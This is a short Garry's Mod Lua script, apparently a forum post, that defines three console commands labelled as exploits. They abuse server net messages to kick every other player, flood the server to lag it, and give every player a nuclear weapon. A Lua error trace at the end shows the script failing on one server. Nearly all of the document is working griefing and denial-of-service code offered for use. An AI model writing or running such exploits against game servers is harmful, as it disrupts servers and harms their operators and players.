concommand.Add("exploit_nlrkickall",function()
for k,v in pairs(player.GetAll()) do
if v != LocalPlayer() then
net.Start("NLRKick")
net.WriteEntity(v)
net.SendToServer()
end
end
end)
concommand.Add("exploit_lagserverf",function()
for k,v in pairs(player.GetAll()) do
net.Start("JoinOrg")
net.WriteEntity(LocalPlayer())
net.WriteString("test")
net.SendToServer()
end
end)
concommand.Add("exploit_giveweaponallextended",function()
for k,v in pairs(player.GetAll()) do
net.Start("giveweapon")
net.WriteEntity(v)
net.WriteString("m9k_davy_crockett")
net.SendToServer()
end
end)

![ERROR] lua/test.lua:22: Calling net.Start with unpooled message name! [Link Removed]
1. Start - [C]:-1
2. unknown - lua/test.lua:22
3. unknown - lua/includes/modules/concommand.lua:54
